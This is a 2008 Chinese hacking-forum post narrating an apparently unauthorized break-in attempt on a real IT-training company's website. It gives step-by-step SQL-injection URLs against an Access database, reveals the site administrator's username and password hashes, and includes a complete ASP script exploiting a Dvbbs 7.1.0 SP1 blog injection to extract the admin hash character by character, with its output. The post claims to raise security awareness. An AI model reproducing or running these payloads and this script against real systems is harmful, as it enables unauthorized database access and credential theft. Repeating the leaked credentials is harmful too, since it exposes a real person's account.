|
手工检测某天IT教育集团网站
樱木花盗 发表于 2008-11-14 18:20:18 |
本文首发 红狼 &天阳
作者:Amxking
首先说本文只是为了介绍一下网站的检测方法,并未实质上完成入侵-Amxking
偶然进入到了誉天IT教育集团网站,看到武汉专业思科培训,CCNA、CCNP、CCSP、CCIE认证培训等等内容,叫我回忆起了自己学cisco时候的经历.于是打算看看他们的学员,于是打开了学员风采栏目.(首页 → 服务互动 → 学员采风)
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89
一不小心潜意识的加了个 '单引号' ,接触返回了如下错误提示:
首页 → 服务互动
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'unid = 89'' 中。
/common.asp,行 125
呵呵,有意思,继续探试 and 1=1
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=1
返回正常页面,但是同时也弹出了"防注射系统".看来网站制作人在网站程序方面还是有安全意识地,不过这吓不倒谁,至少我的群名就叫[火力]依然那么猛,go on......
图:
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=2
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89'%20and%20(select%20count(*)%20from%20msysobjects)>0--
首页 → 服务互动
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'unid = 89' and (select count(*) from msysobjects)>0--' 中。
/common.asp,行 125
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select * from admin)
这个语句是向数据库查询是否存在admin这个表,如果存在则返回正常页面,不存在会返回错误提示.
返回结果如下:
Microsoft JET Database Engine 错误 '80040e37'
Microsoft Jet 数据库引擎找不到输入表或查询 'admin'。 确定它是否存在,以及它的名称的拼写是否正确。
/common.asp,行 125
结果返回的还真是错误提示,看来这常见管理表admin确实受到了足够的重视.经过几翻尝试,最后终于确定了管理表为article_admin ,
感谢我的表字典,阿门!
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20*%20from%20article_admin)
返回正常,确定了管理表为article_admin .
然后我们尝试猜测列名为username:
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and exists(select username from article_admin)
返回正常页面,列名猜测成功.
猜测ID,在猜测ID的时候我平静的心灵终于被打破,产生了想杀人的冲动,ID=21.....
http://www.51xxxxxxxxx.com/2j.as ... 9%20and%20exists%20(select%20id%20from%20article_admin%20where%20id=21)
再次见到了防注射系统提示:
图:
下面我们利用得到的ID,猜测用户名的位数,经过折半测试后确定在了11位.(Amxking:管理员有够变态,一个名字都这么长...)
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20id%20from%20article_admin%20where%20len(username)=11%20and%20id=1)
猜测用户名:
在猜测中,遇到了麻烦,试了几次都返回同样的错误,心早已不平静,愤怒中.还没等爆发,同事叫我吃午饭,于是将问题丢给了工具......
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select count(*) from article_admin where left(username,1)=’a’)
Microsoft JET Database Engine 错误 '80040e10'
至少一个参数没有被指定值。
/common.asp,行 125
吃完饭后,我的宝贝工具还算争气,将用户名及密码交给了我:
username内容:windecember
password内容:70b895ad9b1b2829
是MD5加密的?丢给cmd5试下,不行.我是没有爆破的习惯,谁叫咱不玩肉鸡了.难道就这样结束了吗?灰心不代表停止进攻,否则火力往哪猛去?
(网站后台还没找到,否则就先尝试社工了...)
看到有论坛,进去看眼吧!Powered By Dvbbs Version 7.1.0 Sp1 ,看到这个版本后心情豁然开朗,因为具自己所知该版本存在漏洞的说.
OK,现日了一个小站,用来放远程读取论坛管理员密码程序,通过踩点确定了路径该为http://www.www.51xxxxxxxxx.com.com/52network/boke.asp 而管理员大致确定为
windecember ,谁叫看着这个名字熟悉那,(网站后台用户不就是他......) 嘿嘿,编辑程序远程读取吧!程序代码如下:
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""
for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.51xxxxxxxxx.com/52network/boke.asp?windecember'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>Amxking提醒:请不要使用本程序进行破坏行为!"
Set hehefulsh = Nothing
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</div>
</center>
保存在一个小站根目录下命名为ak.asp ,然后IE访问,读取.........
PS:严重鄙视Sun.Li这小子,风风火火的骂着闯进了群,说我不加他进,为了他进我现T了一个人才加进来.群满N久,换个人我容易吗我...黑封说的好:"开你毛会去吧...."哈哈 ,解气....
读取的结果出来了,比想象中快:
前1位MD5值为:a 其他密码正在读取中,请等待。。。
前2位MD5值为:ad 其他密码正在读取中,请等待。。。
前3位MD5值为:adc 其他密码正在读取中,请等待。。。
前4位MD5值为:adc9 其他密码正在读取中,请等待。。。
前5位MD5值为:adc98 其他密码正在读取中,请等待。。。
前6位MD5值为:adc989 其他密码正在读取中,请等待。。。
前7位MD5值为:adc9892 其他密码正在读取中,请等待。。。
前8位MD5值为:adc98924 其他密码正在读取中,请等待。。。
前9位MD5值为:adc98924f 其他密码正在读取中,请等待。。。
前10位MD5值为:adc98924f7 其他密码正在读取中,请等待。。。
前11位MD5值为:adc98924f7b 其他密码正在读取中,请等待。。。
前12位MD5值为:adc98924f7b6 其他密码正在读取中,请等待。。。
前13位MD5值为:adc98924f7b6b 其他密码正在读取中,请等待。。。
前14位MD5值为:adc98924f7b6be 其他密码正在读取中,请等待。。。
前15位MD5值为:adc98924f7b6beb 其他密码正在读取中,请等待。。。
前16位MD5值为:adc98924f7b6beb9 其他密码正在读取中,请等待。。。
成功读取密码的MD5值,为:adc98924f7b6beb9
ok,再次丢给在线破MD5密码的站点查,结果证明了我本善良......
希望以本篇文章警醒各网站负责人提高网络安全意识,普及网络安全技术.-Amxking
本文完
http://amxking.bokee.com/viewdiary.179132855.html
PS:跟誉天的工作人员沟通后答应将网站地址隐藏-Amxking 11/28 |
|
发表评论:
|
